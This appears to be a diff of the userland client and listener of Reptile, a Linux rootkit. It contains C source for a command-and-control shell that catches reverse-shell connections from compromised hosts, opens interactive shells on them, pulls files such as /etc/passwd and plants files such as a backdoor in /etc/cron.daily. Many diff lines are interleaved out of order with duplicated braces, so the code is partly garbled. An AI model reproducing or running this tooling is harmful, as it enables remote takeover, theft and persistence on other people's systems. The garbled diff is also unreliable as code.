 	if (!var_array[4]) {
 		fprintf(stdout, "%s %s is not defined!\n", bad, var_str_up[4]);
 		return 1;
 	}
 	if (!var_array[6]) {
 		fprintf(stdout, "%s %s is not defined!\n", bad, var_str_up[6]);
 		return 1;
 	}
 	if (!var_array[8]) {
 		fprintf(stdout, "%s %s is not defined!\n", bad, var_str_up[8]);
 		return 1;
 	}
 	if (!(strcmp(var_array[6], "icmp") == 0 ||
 	    strcmp(var_array[6], "ICMP") == 0)) {
 		if (!var_array[3]) {
 			fprintf(stdout, "%s %s is not defined!\n", bad,
 				var_str_up[3]);
 			return 1;
 		}
 		if (!var_array[5]) {
 			fprintf(stdout, "%s %s is not defined!\n", bad,
 				var_str_up[5]);
 			return 1;
 		}
 	}
-	// 构建用于启动监听器和数据包发送器的参数数组
+	char *arg_listener[] = {listener,     "-p", var_array[1], "-s",
-	char* arg_listener[] = { listener,     "-p", var_array[1], "-s",
+				var_array[7], NULL, NULL};
 							var_array[7], NULL, NULL };
-	char* arg_packet[] = { packet,       "-t", var_array[4], "-x",
+	char *arg_packet[] = {packet,       "-t", var_array[4], "-x",
-						  var_array[6], "-s", var_array[2], "-l",
+			      var_array[6], "-s", var_array[2], "-l",
-						  var_array[0], "-p", var_array[1], "-k",
+			      var_array[0], "-p", var_array[1], "-k",
-						  var_array[8], "-q", var_array[3], "-r",
+			      var_array[8], "-q", var_array[3], "-r",
-						  var_array[5], NULL, NULL };
+			      var_array[5], NULL, NULL};
 	// 创建子进程
 	pid = fork();
 	// 如果fork失败，打印错误信息并退出
 	if (pid == -1)
 		fatal("on forking proccess");
 	// 父进程等待子进程结束
 	if (pid > 0) {
 		signal(SIGTERM, interrupt);
 		signal(SIGINT, interrupt);
@ -326,18 +348,13 @@ int run(char** args) {
 		} while (!WIFEXITED(status) && !WIFSIGNALED(status));
 	}
 	// 子进程执行具体的启动逻辑
 	if (pid == 0) {
 		// 创建另一个子进程
 		pid2 = fork();
 		// 如果fork失败，打印错误信息并退出
 		if (pid2 == -1)
 			fatal("on forking proccess");
 		// 第二个子进程启动监听器
 		if (pid2 > 0) {
 			// 根据配置决定是否传递某些参数
 			if (var_array[7] == NULL) {
 				arg_listener[3] = NULL;
 				arg_listener[4] = NULL;
@ -346,11 +363,9 @@ int run(char** args) {
 				fprintf(stderr, "%s listener could not be launched\n", bad);
 		}
 		// 第三个子进程发送数据包
 		if (pid2 == 0) {
 			// 根据协议类型调整参数
 			if (strcmp(var_array[6], "icmp") == 0 ||
-				strcmp(var_array[6], "ICMP") == 0) {
+			    strcmp(var_array[6], "ICMP") == 0) {
 				arg_packet[13] = NULL;
 				arg_packet[14] = NULL;
 				arg_packet[15] = NULL;
@ -368,61 +383,59 @@ int run(char** args) {
 	return 1;
 }
-// export函数用于将当前配置导出到文件
+/*
-int export(char** args) {
+ * Thanks aliyuchang33 for suggesting this! ;)
 *
 * https://github.com/f0rb1dd3n/Reptile/pull/61/commits/0482eeff93c5b3f9097f7e06e2b2a0fcf248eb8e
 *
 */
 int export(char **args)
 {
 	int vars;
-	FILE* confile;
+	FILE *confile;
 	// 如果没有提供参数，返回错误代码1
 	if (args[0] == NULL)
 		return 1;
 	// 如果没有提供文件名，打印错误信息并返回错误代码1
 	if (args[1] == NULL) {
 		fprintf(stdout, "%s wrong syntax!\n", bad);
 		return 1;
 	}
 	// 尝试打开文件，如果失败，打印错误信息并返回错误代码1
 	if (!(confile = fopen(args[1], "w+"))) {
 		fprintf(stderr, "%s Cannot open config file\n", bad);
 		return 1;
 	}
 	// 将所有参数的值写入文件
 	for (vars = 0; vars < 9; vars++)
 		fprintf(confile, "%s\n", var_array[vars]);
 	// 关闭文件并打印成功信息
 	fclose(confile);
 	fprintf(stdout, "%s Configuration exported\n", good);
 	return 1;
 }
-// load函数用于从文件加载配置
+int load(char **args)
-int load(char** args) {
+{
 	int vars;
-	FILE* confile;
+    	FILE *confile;
 	// 如果没有提供参数，返回错误代码1
 	if (args[0] == NULL)
 		return 1;
 	// 如果没有提供文件名，打印错误信息并返回错误代码1
 	if (args[1] == NULL) {
 		fprintf(stdout, "%s wrong syntax!\n", bad);
 		return 1;
 	}
 	// 尝试打开文件，如果失败，打印错误信息并返回错误代码1
 	if (!(confile = fopen(args[1], "r+"))) {
 		fprintf(stderr, "%s Cannot open config file\n", bad);
 		return 1;
 	}
 	// 从文件中读取参数值，并存储到var_array中
 	for (vars = 0; vars < 9; vars++) {
-		char arg[50] = { 0 };
+		char arg[50] = {0};
 		fgets(arg, 50, confile);
 		if (strcmp(arg, "(null)\n")) {
@ -431,64 +444,55 @@ int load(char** args) {
 		}
 	}
 	// 关闭文件并打印成功信息
 	fclose(confile);
 	fprintf(stdout, "%s Configuration loaded\n", good);
 	return 1;
 }
-// execute函数用于执行内置命令或启动外部程序
+int execute(char **args)
-int execute(char** args) {
+{
 	int i;
 	// 如果没有提供参数，返回错误代码1
 	if (args[0] == NULL)
 		return 1;
 	// 遍历所有内置命令，查找匹配的命令并执行
 	for (i = 0; i < num_builtins(); i++) {
 		if (strcmp(args[0], builtin_str[i]) == 0)
 			return (*builtin_func[i])(args);
 	}
 	// 如果没有找到匹配的内置命令，尝试启动外部程序
 	return launch(args);
 }
-// read_line函数用于读取用户输入的一行命令
+char *read_line(void)
-char* read_line(void) {
+{
 	int bufsize = RL_BUFSIZE;
 	int position = 0;
-	char* buffer = malloc(sizeof(char) * bufsize);
+	char *buffer = malloc(sizeof(char) * bufsize);
 	int c;
 	// 如果内存分配失败，打印错误信息并退出
 	if (!buffer) {
 		fprintf(stderr, "reptile: allocation error\n");
 		exit(EXIT_FAILURE);
 	}
 	// 循环读取用户输入，直到换行符
 	while (1) {
 		c = getchar();
 		if (c == EOF) {
 			free(buffer);
 			exit(EXIT_SUCCESS);
-		}
+		} else if (c == '\n') {
 		else if (c == '\n') {
 			buffer[position] = '\0';
 			return buffer;
-		}
+		} else {
 		else {
 			buffer[position] = c;
 		}
 		position++;
 		// 如果超出缓冲区大小，扩大缓冲区
 		if (position >= bufsize) {
 			bufsize += RL_BUFSIZE;
-			char* buffer_backup = buffer;
+			char *buffer_backup = buffer;
 			if ((buffer = realloc(buffer, bufsize)) == NULL) {
 				free(buffer_backup);
 				fprintf(stderr, "reptile: allocation error\n");
@ -498,29 +502,26 @@ char* read_line(void) {
 	}
 }
-// parse函数用于解析用户输入的命令行，将其分割为参数数组
+char **parse(char *line)
-char** parse(char* line) {
+{
 	int bufsize = TOK_BUFSIZE, position = 0;
-	char** tokens = malloc(bufsize * sizeof(char*));
+	char **tokens = malloc(bufsize * sizeof(char *));
-	char* token, ** tokens_backup;
+	char *token, **tokens_backup;
 	// 如果内存分配失败，打印错误信息并退出
 	if (!tokens) {
 		fprintf(stderr, "reptile: allocation error\n");
 		exit(EXIT_FAILURE);
 	}
 	// 使用strtok函数分割命令行
 	token = strtok(line, TOK_DELIM);
 	while (token != NULL) {
 		tokens[position] = token;
 		position++;
 		// 如果超出缓冲区大小，扩大缓冲区
 		if (position >= bufsize) {
 			bufsize += TOK_BUFSIZE;
 			tokens_backup = tokens;
-			tokens = realloc(tokens, bufsize * sizeof(char*));
+			tokens = realloc(tokens, bufsize * sizeof(char *));
 			if (!tokens) {
 				free(tokens_backup);
 				fprintf(stderr, "reptile: allocation error\n");
@ -534,13 +535,12 @@ char** parse(char* line) {
 	return tokens;
 }
-// client_loop函数用于进入命令行循环，等待用户输入命令
+void client_loop()
-void client_loop() {
+{
-	char* line;
+	char *line;
-	char** args;
+	char **args;
 	int status;
 	// 循环等待用户输入命令
 	do {
 		line = readline("\e[00;31mreptile-client> \e[00m");
 		add_history(line);
@ -555,35 +555,31 @@ void client_loop() {
 	clear_history();
 }
-// main函数是程序的入口点
+int main()
-int main() {
+{
 	int len;
-	char* pwd = get_current_dir_name();
+	char *pwd = get_current_dir_name();
 	// 清屏并打印欢迎信息
 	system("clear");
 	printf("\n\e[01;36mReptile Client\e[00m\n");
 	printf("\e[01;32mWritten by: F0rb1dd3n\e[00m\n");
 	banner2();
 	printf("\n");
 	// 获取当前工作目录，并为监听器和数据包程序分配内存
 	len = strlen(pwd);
-	listener = (char*)malloc(len + 10);
+	listener = (char *)malloc(len + 10);
 	// 如果内存分配失败，打印错误信息并退出
 	if (!listener)
 		fatal("malloc");
-	packet = (char*)malloc(len + 8);
+	packet = (char *)malloc(len + 8);
 	if (!packet) {
 		free(listener);
 		fatal("malloc");
 	}
 	// 初始化监听器和数据包程序的路径
 	bzero(listener, len + 10);
 	bzero(packet, len + 8);
@ -593,22 +589,16 @@ int main() {
 	strcpy(packet, pwd);
 	strcat(packet, "/packet");
 	// 创建子进程
 	pid = fork();
 	// 如果fork失败，打印错误信息并退出
 	if (pid == -1)
 		fatal("on forking proccess");
 	// 父进程进入命令行循环
 	if (pid > 0)
 		client_loop();
-	// 子进程执行后台任务（这部分代码被注释掉了）
+	// if (pid == 0)
 	// background job
 	return EXIT_SUCCESS;
 }
 //客服端实现，写了一个简易shell，包含了一些内置功能的实现("help", "set", "unset", "show", "run", "export", "load", "exit")
 //help打印其他命令使用方法
 //exit退出
 //set设置变量值，需要两个参数，参数一为各参数类型("lhost", "lport", "srchost", "srcport", "rhost", "rport", "prot", "pass", "token", 不区分大小写)，参数二为该参数的值，其值存储在var_array中
--- a/src/Reptile/userland/client/listener.c
+++ b/src/Reptile/userland/client/listener.c
@ -23,114 +23,105 @@
 #include "pel.h"
 #include "util.h"
-// 全局变量定义
+extern char *optarg;
-extern char* optarg; // 获取命令行参数的值
+unsigned char message[BUFSIZE + 1];
-unsigned char message[BUFSIZE + 1]; // 定义一个缓冲区，用于存储发送和接收的消息
+char *password = NULL;
-char* password = NULL; // 定义一个全局变量，用于存储连接密码
+int sockfd;
-int sockfd; // 定义一个全局变量，用于存储套接字文件描述符
+pid_t pid;
-pid_t pid; // 定义一个全局变量，用于存储进程ID
+
-
+int help(int sock, char **args);
-// 函数原型声明
+int __exit(int sock, char **args);
-int help(int sock, char** args); // 提供帮助信息的函数
+int shell(int sock, char **args);
-int __exit(int sock, char** args); // 退出函数，用于关闭连接
+int get_file(int sock, char **args);
-int shell(int sock, char** args); // 打开一个交互式shell的函数
+int put_file(int sock, char **args);
-int get_file(int sock, char** args); // 从远程主机下载文件的函数
+int delay(int sock, char **args);
-int put_file(int sock, char** args); // 向远程主机上传文件的函数
+
-int delay(int sock, char** args); // 设置反向shell连接间隔的函数
+char *builtin_str[] = {"help", "download", "upload", "shell", "delay", "exit"};
-
+int (*builtin_func[])(int sock, char **) = {&help,  &get_file, &put_file,
-// 内置命令字符串数组，用于映射命令名称到其对应的函数
+					    &shell, &delay,    &__exit};
-char* builtin_str[] = { "help", "download", "upload", "shell", "delay", "exit" };
+
-// 内置命令对应的函数指针数组，用于根据命令名称调用对应的函数
+int num_builtins() { return sizeof(builtin_str) / sizeof(char *); }
-int (*builtin_func[])(int sock, char**) = { &help, &get_file, &put_file, &shell, &delay, &__exit };
+
-
+void pel_error(char *s)
-// 返回内置命令的数量
+{
 int num_builtins() {
 	return sizeof(builtin_str) / sizeof(char*);
 }
 // 错误处理函数，根据错误代码打印相应的错误信息
 void pel_error(char* s) {
 	switch (pel_errno) {
 	case PEL_CONN_CLOSED:
 		fprintf(stderr, "%s %s: Connection closed.\n", bad, s);
 		break;
 	case PEL_SYSTEM_ERROR:
 		p_error(s);
 		break;
 	case PEL_WRONG_CHALLENGE:
 		fprintf(stderr, "%s %s: Wrong challenge.\n", bad, s);
 		break;
 	case PEL_BAD_MSG_LENGTH:
 		fprintf(stderr, "%s %s: Bad message length.\n", bad, s);
 		break;
 	case PEL_CORRUPTED_DATA:
 		fprintf(stderr, "%s %s: Corrupted data.\n", bad, s);
 		break;
 	case PEL_UNDEFINED_ERROR:
 		fprintf(stderr, "%s %s: No error.\n", bad, s);
 		break;
 	default:
 		fprintf(stderr, "%s %s: Unknown error code.\n", bad, s);
 		break;
 	}
 }
-// 为下载命令提供帮助信息的函数
+void help_download()
-void help_download() {
+{
 	fprintf(stdout, "%s <file path> <dest dir>\n", builtin_str[1]);
 	fprintf(stdout, "Example: download /etc/passwd /tmp\n");
 }
-// 为上传命令提供帮助信息的函数
+void help_upload()
-void help_upload() {
+{
 	fprintf(stdout, "%s <file path> <dest dir>\n", builtin_str[2]);
 	fprintf(stdout, "Example: upload /root/backdoor /etc/cron.daily\n");
 }
-// 为延迟命令提供帮助信息的函数
+void help_delay()
-void help_delay() {
+{
 	fprintf(stdout, "%s <seconds>\n", builtin_str[4]);
 	fprintf(stdout, "Example: delay 3600\n\n");
-	fprintf(stdout, "%s Use \"delay 0\" if you don't want a connection every X time\n", warn);
+	fprintf(stdout, "%s Use \"delay 0\" if you don't wanna a "
 			"connecion every X time\n", warn);
 }
-// 当命令不需要帮助信息时调用的函数
+void no_help()
-void no_help() {
+{
 	fprintf(stdout, "This command doesn't need help\n");
 }
-// 提供帮助信息的函数
+int help(int sock, char **args)
-int help(int sock, char** args) {
+{
 	// 如果没有提供子命令或者sock为-1，则返回错误代码1
 	if (args[0] == NULL && sock == -1)
 		return 1;
 	// 如果提供了子命令，则根据子命令提供具体的帮助信息
 	if (args[1] != NULL) {
 		if (strcmp(args[1], builtin_str[0]) == 0) {
 			no_help();
-		}
+		} else if (strcmp(args[1], builtin_str[1]) == 0) {
 		else if (strcmp(args[1], builtin_str[1]) == 0) {
 			help_download();
-		}
+		} else if (strcmp(args[1], builtin_str[2]) == 0) {
 		else if (strcmp(args[1], builtin_str[2]) == 0) {
 			help_upload();
-		}
+		} else if (strcmp(args[1], builtin_str[3]) == 0) {
 		else if (strcmp(args[1], builtin_str[3]) == 0) {
 			no_help();
-		}
+		} else if (strcmp(args[1], builtin_str[4]) == 0) {
 		else if (strcmp(args[1], builtin_str[4]) == 0) {
 			help_delay();
-		}
+		} else if (strcmp(args[1], builtin_str[5]) == 0) {
 		else if (strcmp(args[1], builtin_str[5]) == 0) {
 			no_help();
-		}
+		} else {
 		else {
 			fprintf(stdout, "This command is not valid!\n");
 		}
-	}
+	} else {
 	else {
 		// 如果没有提供子命令，则打印所有命令的帮助信息
 		fprintf(stdout, "\n\e[01;36mReptile Shell\e[00m\n");
 		fprintf(stdout, "\e[01;32mWritten by: F0rb1dd3n\e[00m\n\n");
 		fprintf(stdout, "\t%s\t\tShow this help\n", builtin_str[0]);
@ -146,95 +137,93 @@ int help(int sock, char** args) {
 	return 1;
 }
-// 退出函数，用于关闭连接
+int __exit(int sock, char **args)
-int __exit(int sock, char** args) {
+{
 	// 如果没有提供参数或者sock为-1，则返回错误代码1
 	if (args[0] == NULL && sock == -1)
 		return 1;
-	// 发送退出消息给远程主机
+	pel_send_msg(sock, (unsigned char *)EXIT, EXIT_LEN);
 	pel_send_msg(sock, (unsigned char*)EXIT, EXIT_LEN);
 	fprintf(stdout, "\n");
 	return 0;
 }
-// 打开一个交互式shell的函数
+int shell(int sock, char **args)
-int shell(int sock, char** args) {
+{
 	// 定义文件描述符集合，用于select函数
 	fd_set rd;
-	// 定义终端类型和窗口大小等变量
+	char *term, *temp;
 	char* term, * temp;
 	int ret, len, imf, i, size;
 	struct winsize ws;
 	struct termios tp, tr;
 	// 如果没有提供参数或者sock为-1，则返回错误代码1
 	if (args[0] == NULL && sock == -1)
 		return 1;
 	// 获取终端类型
 	term = getenv("TERM");
 	if (term == NULL)
 		term = "vt100";
 	// 发送终端类型到远程主机
 	len = strlen(term);
-	ret = pel_send_msg(sock, (unsigned char*)term, len);
+
 	ret = pel_send_msg(sock, (unsigned char *)term, len);
 	if (ret != PEL_SUCCESS) {
 		pel_error("pel_send_msg");
 		return 1;
 	}
 	// 如果标准输入是终端，设置imf为1
 	imf = 0;
 	if (isatty(0)) {
 		imf = 1;
-		// 获取窗口大小
+
 		if (ioctl(0, TIOCGWINSZ, &ws) < 0) {
 			p_error("ioctl(TIOCGWINSZ)");
 			return 1;
 		}
-	}
+	} else {
 	else {
 		ws.ws_row = 25;
 		ws.ws_col = 80;
 	}
 	// 发送窗口大小到远程主机
 	message[0] = (ws.ws_row >> 8) & 0xFF;
 	message[1] = (ws.ws_row) & 0xFF;
 	message[2] = (ws.ws_col >> 8) & 0xFF;
 	message[3] = (ws.ws_col) & 0xFF;
 	ret = pel_send_msg(sock, message, 4);
 	if (ret != PEL_SUCCESS) {
 		pel_error("pel_send_msg");
 		return 1;
 	}
 	// 如果命令是shell，则发送shell命令到远程主机
 	if (strcmp(args[0], builtin_str[3]) == 0) {
-		temp = (char*)malloc(2);
+		temp = (char *)malloc(2);
 		if (!temp) {
 			p_error("malloc");
 			return 1;
 		}
 		temp[0] = RUNSHELL;
 		temp[1] = '\0';
 		fprintf(stdout, "\n");
-	}
+	} else {
 	else {
 		// 如果命令不是shell，则发送用户输入的命令到远程主机
 		size = 1;
 		len = 0;
-		temp = (char*)malloc(size);
+
 		temp = (char *)malloc(size);
 		if (!temp) {
 			p_error("malloc");
 			return 1;
 		}
 		while (args[len] != NULL) {
 			size++;
 			size += strlen(args[len]);
-			char* temp_backup = temp;
+			char *temp_backup = temp;
 			if ((temp = realloc(temp, size)) == NULL) {
 				free(temp_backup);
 				p_error("realloc");
@ -242,337 +231,390 @@ int shell(int sock, char** args) {
 			}
 			len++;
 		}
 		memset(temp, '\0', size);
 		for (i = 0; i < len; i++) {
 			strcat(temp, args[i]);
 			strcat(temp, " ");
 		}
 	}
 	len = strlen(temp);
-	ret = pel_send_msg(sock, (unsigned char*)temp, len);
+	ret = pel_send_msg(sock, (unsigned char *)temp, len);
 	free(temp);
 	if (ret != PEL_SUCCESS) {
 		pel_error("pel_send_msg");
 		return 1;
 	}
 	// 设置终端属性，用于非规范模式下的输入输出
 	if (isatty(1)) {
 		if (tcgetattr(1, &tp) < 0) {
 			p_error("tcgetattr");
 			return 1;
 		}
-		memcpy((void*)&tr, (void*)&tp, sizeof(tr));
+
 		memcpy((void *)&tr, (void *)&tp, sizeof(tr));
 		tr.c_iflag |= IGNPAR;
 		tr.c_iflag &=
-			~(ISTRIP | INLCR | IGNCR | ICRNL | IXON | IXANY | IXOFF);
+		    ~(ISTRIP | INLCR | IGNCR | ICRNL | IXON | IXANY | IXOFF);
 		tr.c_lflag &=
-			~(ISIG | ICANON | ECHO | ECHOE | ECHOK | ECHONL | IEXTEN);
+		    ~(ISIG | ICANON | ECHO | ECHOE | ECHOK | ECHONL | IEXTEN);
 		tr.c_oflag &= ~OPOST;
 		tr.c_cc[VMIN] = 1;
 		tr.c_cc[VTIME] = 0;
 		if (tcsetattr(1, TCSADRAIN, &tr) < 0) {
 			p_error("tcsetattr");
 			return 1;
 		}
 	}
 	// 进入一个循环，处理输入输出
 	while (1) {
 		FD_ZERO(&rd);
 		if (imf != 0)
 			FD_SET(0, &rd);
 		FD_SET(sock, &rd);
 		if (select(sock + 1, &rd, NULL, NULL, NULL) < 0) {
 			p_error("select");
 			break;
 		}
 		if (FD_ISSET(sock, &rd)) {
 			ret = pel_recv_msg(sock, message, &len);
 			if (ret != PEL_SUCCESS) {
 				pel_error("pel_recv_msg");
 				break;
 			}
-			if (strncmp((char*)message, EXIT, EXIT_LEN) == 0) {
+
 			if (strncmp((char *)message, EXIT, EXIT_LEN) == 0) {
 				if (isatty(1))
 					tcsetattr(1, TCSADRAIN, &tp);
 				fprintf(stdout, "\n");
 				return 1;
 			}
 			if (write(1, message, len) != len) {
 				p_error("write");
 				break;
 			}
 		}
 		if (imf != 0 && FD_ISSET(0, &rd)) {
 			if ((len = read(0, message, BUFSIZE)) < 0) {
 				p_error("read");
 				break;
 			}
 			if (len == 0) {
 				fprintf(stderr, "stdin: end-of-file\n");
 				break;
 			}
 			ret = pel_send_msg(sock, message, len);
 			if (ret != PEL_SUCCESS) {
 				pel_error("pel_send_msg");
 				break;
 			}
 		}
 	}
 	if (isatty(1))
 		tcsetattr(1, TCSADRAIN, &tp);
 	return 1;
 }
-// 从远程主机下载文件的函数
+int get_file(int sock, char **args)
-int get_file(int sock, char** args) {
+{
-	char* temp, * pathname;
+	char *temp, *pathname;
 	int ret, len, fd, total;
 	unsigned char out = OUT;
 	// 如果没有提供足够的参数或者sock为-1，则返回错误代码1
 	if (args[1] == NULL || args[2] == NULL) {
 		fprintf(stderr, "%s wrong arguments\n\n", bad);
 		if (pel_send_msg(sock, &out, 1) != PEL_SUCCESS)
 			pel_error("pel_send_msg");
 		return 1;
 	}
 	// 发送文件路径到远程主机
 	len = strlen(args[1]);
-	ret = pel_send_msg(sock, (unsigned char*)args[1], len);
+
 	ret = pel_send_msg(sock, (unsigned char *)args[1], len);
 	if (ret != PEL_SUCCESS) {
 		pel_error("pel_send_msg");
 		return 1;
 	}
 	// 构建保存文件的路径
 	temp = strrchr(args[1], '/');
 	if (temp != NULL)
 		temp++;
 	if (temp == NULL)
 		temp = args[1];
 	len = strlen(args[2]);
-	pathname = (char*)malloc(len + strlen(temp) + 2);
+
 	pathname = (char *)malloc(len + strlen(temp) + 2);
 	if (pathname == NULL) {
 		p_error("malloc");
 		return 1;
 	}
 	strcpy(pathname, args[2]);
 	strcpy(pathname + len, "/");
 	strcpy(pathname + len + 1, temp);
 	// 创建文件
 	fd = creat(pathname, 0644);
 	if (fd < 0) {
 		p_error("creat");
 		free(pathname);
 		return 1;
 	}
 	free(pathname);
 	// 接收文件数据并保存
 	total = 0;
 	while (1) {
 		ret = pel_recv_msg(sock, message, &len);
 		if (ret != PEL_SUCCESS) {
 			pel_error("pel_recv_msg");
 			fprintf(stderr, "%s Transfer failed.\n", bad);
 			return 1;
 		}
-		if (strncmp((char*)message, EXIT, EXIT_LEN) == 0 && total > 0)
+
 		if (strncmp((char *)message, EXIT, EXIT_LEN) == 0 && total > 0)
 			break;
 		if (write(fd, message, len) != len) {
 			p_error("write");
 			return 1;
 		}
 		total += len;
 		fprintf(stdout, "%d\r", total);
 		fflush(stdout);
 	}
 	fprintf(stdout, "%s %d done.\n\n", good, total);
 	return 1;
 }
-// 向远程主机上传文件的函数
+int put_file(int sock, char **args)
-int put_file(int sock, char** args) {
+{
-	char* temp, * pathname;
+	char *temp, *pathname;
 	int ret, len, fd, total;
 	unsigned char out = OUT;
 	// 如果没有提供足够的参数或者sock为-1，则返回错误代码1
 	if (args[1] == NULL || args[2] == NULL) {
 		fprintf(stderr, "%s wrong arguments\n\n", bad);
 		if (pel_send_msg(sock, &out, 1) != PEL_SUCCESS)
 			pel_error("pel_send_msg");
 		return 1;
 	}
 	// 构建文件路径
 	temp = strrchr(args[1], '/');
 	if (temp != NULL)
 		temp++;
 	if (temp == NULL)
 		temp = args[1];
 	len = strlen(args[2]);
-	pathname = (char*)malloc(len + strlen(temp) + 2);
+
 	pathname = (char *)malloc(len + strlen(temp) + 2);
 	if (pathname == NULL) {
 		p_error("malloc");
 		return 1;
 	}
 	strcpy(pathname, args[2]);
 	strcpy(pathname + len, "/");
 	strcpy(pathname + len + 1, temp);
 	// 发送文件路径到远程主机
 	len = strlen(pathname);
-	ret = pel_send_msg(sock, (unsigned char*)pathname, len);
+
 	ret = pel_send_msg(sock, (unsigned char *)pathname, len);
 	free(pathname);
 	if (ret != PEL_SUCCESS) {
 		pel_error("pel_send_msg");
 		return 1;
 	}
 	// 打开文件并发送文件数据
 	fd = open(args[1], O_RDONLY);
 	if (fd < 0) {
 		p_error("open");
 		return 1;
 	}
 	total = 0;
 	while (1) {
 		len = read(fd, message, BUFSIZE);
 		if (len < 0) {
 			p_error("read");
 			return 1;
 		}
 		if (len == 0) {
 			break;
 		}
 		ret = pel_send_msg(sock, message, len);
 		if (ret != PEL_SUCCESS) {
 			pel_error("pel_send_msg");
 			fprintf(stderr, "%s Transfer failed.\n", bad);
 			return 1;
 		}
 		total += len;
 		printf("%s %d\r", good, total);
 		fflush(stdout);
 	}
-	// 发送结束信号
+	pel_send_msg(sock, (unsigned char *)EXIT, EXIT_LEN);
-	pel_send_msg(sock, (unsigned char*)EXIT, EXIT_LEN);
+
 	printf("%s %d done.\n\n", good, total);
 	return 1;
 }
-// 设置反向shell连接间隔的函数
+int delay(int sock, char **args)
-int delay(int sock, char** args) {
+{
 	int ret, flag;
 	unsigned int i, j;
-	char* numbers = "0123456789";
+	char *numbers = "0123456789";
 	unsigned char out = OUT;
 	// 如果没有提供参数或者sock为-1，则返回错误代码1
 	if (args[1] == NULL) {
 		fprintf(stderr, "%s no arguments\n\n", bad);
 		if (pel_send_msg(sock, &out, 1) != PEL_SUCCESS)
 			pel_error("pel_send_msg");
 		return 1;
 	}
 	// 检查参数是否为数字
 	for (i = 0; i < strlen(args[1]); i++) {
 		flag = 0;
 		for (j = 0; j < strlen(numbers); j++) {
 			if (args[1][i] == numbers[j])
 				flag = 1;
 		}
 		if (flag == 0) {
 			fprintf(stderr, "%s wrong argument\n\n", bad);
 			if (pel_send_msg(sock, &out, 1) != PEL_SUCCESS)
 				pel_error("pel_send_msg");
 			return 1;
 		}
 	}
-	// 发送延迟时间设置到远程主机
+	ret = pel_send_msg(sock, (unsigned char *)args[1], strlen(args[1]));
-	ret = pel_send_msg(sock, (unsigned char*)args[1], strlen(args[1]));
+
 	if (ret != PEL_SUCCESS) {
 		pel_error("pel_send_msg");
 		return 1;
 	}
 	fprintf(stdout, "%s delay -> %s\n\n", good, args[1]);
 	return 1;
 }
-// 执行命令的函数
+int execute(int sock, char **args)
-int execute(int sock, char** args) {
+{
 	int i, ret;
 	// 如果没有提供参数或者sock为-1，则返回错误代码1
 	if (args[0] == NULL || sock == -1)
 		return 1;
 	// 查找并执行内置命令
 	for (i = 0; i < num_builtins(); i++) {
 		if (strcmp(args[0], builtin_str[i]) == 0) {
 			if (i == 0) {
 				return (*builtin_func[i])(sock, args);
-			}
+			} else {
-			else {
+				ret =
-				ret = pel_send_msg(sock, (unsigned char*)&i, 1);
+				    pel_send_msg(sock, (unsigned char *)&i, 1);
 				if (ret != PEL_SUCCESS) {
 					pel_error("pel_send_msg");
 					return 1;
 				}
 				return (*builtin_func[i])(sock, args);
 			}
 		}
 	}
 	// 如果不是内置命令，发送shell命令
 	i = 3;
-	ret = pel_send_msg(sock, (unsigned char*)&i, 1);
+	ret = pel_send_msg(sock, (unsigned char *)&i, 1);
 	if (ret != PEL_SUCCESS) {
 		pel_error("pel_send_msg");
 		return 1;
 	}
 	return (*builtin_func[3])(sock, args);
 }
-// 读取一行输入的函数
+char *read_line(void)
-char* read_line(void) {
+{
 	int bufsize = RL_BUFSIZE;
 	int position = 0;
-	char* buffer = malloc(sizeof(char) * bufsize);
+	char *buffer = malloc(sizeof(char) * bufsize);
 	int c;
 	// 如果内存分配失败，打印错误信息并退出
 	if (!buffer) {
 		fprintf(stderr, "reptile: allocation error\n");
 		exit(EXIT_FAILURE);
 	}
 	// 循环读取用户输入，直到换行符
 	while (1) {
 		c = getchar();
 		if (c == EOF) {
 			free(buffer);
 			exit(EXIT_SUCCESS);
-		}
+		} else if (c == '\n') {
 		else if (c == '\n') {
 			buffer[position] = '\0';
 			return buffer;
-		}
+		} else {
 		else {
 			buffer[position] = c;
 		}
 		position++;
 		if (position >= bufsize) {
 			bufsize += RL_BUFSIZE;
-			char* buffer_backup = buffer;
+			char *buffer_backup = buffer;
 			if ((buffer = realloc(buffer, bufsize)) == NULL) {
 				free(buffer_backup);
 				fprintf(stderr, "reptile: allocation error\n");
@ -582,155 +624,149 @@ char* read_line(void) {
 	}
 }
-// 解析输入行的函数
+char **parse(char *line)
-char** parse(char* line) {
+{
 	int bufsize = TOK_BUFSIZE, position = 0;
-	char** tokens = malloc(bufsize * sizeof(char*));
+	char **tokens = malloc(bufsize * sizeof(char *));
-	char* token, ** tokens_backup;
+	char *token, **tokens_backup;
 	// 如果内存分配失败，打印错误信息并退出
 	if (!tokens) {
 		fprintf(stderr, "reptile: allocation error\n");
 		exit(EXIT_FAILURE);
 	}
 	// 使用strtok函数分割命令行
 	token = strtok(line, TOK_DELIM);
 	while (token != NULL) {
 		tokens[position] = token;
 		position++;
 		if (position >= bufsize) {
 			bufsize += TOK_BUFSIZE;
 			tokens_backup = tokens;
-			tokens = realloc(tokens, bufsize * sizeof(char*));
+			tokens = realloc(tokens, bufsize * sizeof(char *));
 			if (!tokens) {
 				free(tokens_backup);
 				fprintf(stderr, "reptile: allocation error\n");
 				exit(EXIT_FAILURE);
 			}
 		}
 		token = strtok(NULL, TOK_DELIM);
 	}
 	tokens[position] = NULL;
 	return tokens;
 }
-// 命令行循环函数
+void reptile_loop(int sock)
-void reptile_loop(int sock) {
+{
-	char* line;
+	char *line;
-	char** args;
+	char **args;
 	int status;
 	// 循环读取命令并执行，直到接收到退出信号
 	do {
 		line = readline("\e[01;32mreptile> \e[00m");
 		add_history(line);
 		args = parse(line);
 		status = execute(sock, args);
 		free(line);
 		free(args);
 	} while (status);
 	clear_history();
 }
-// 处理关闭连接的信号
+void handle_shutdown(int signal)
-void handle_shutdown(int signal) {
+{
 	close(sockfd);
 	exit(signal);
 }
-// 监听连接的函数
+void listener(int port)
-void listener(int port) {
+{
 	int new_sockfd, yes = 1;
 	struct sockaddr_in host_addr, client_addr;
 	socklen_t sin_size;
 	// 创建套接字
 	if ((sockfd = socket(PF_INET, SOCK_STREAM, 0)) == -1) {
 		kill(pid, SIGQUIT);
 		fatal("in socket");
 	}
-	// 设置套接字选项，允许立即重用地址
+	if (setsockopt(sockfd, SOL_SOCKET, SO_REUSEADDR, &yes, sizeof(int)) ==
-	if (setsockopt(sockfd, SOL_SOCKET, SO_REUSEADDR, &yes, sizeof(int)) == -1) {
+	    -1) {
 		kill(pid, SIGQUIT);
 		close(sockfd);
 		fatal("setting socket option SO_REUSEADDR");
 	}
 	// 设置信号处理函数，处理关闭连接的信号
 	signal(SIGTERM, handle_shutdown);
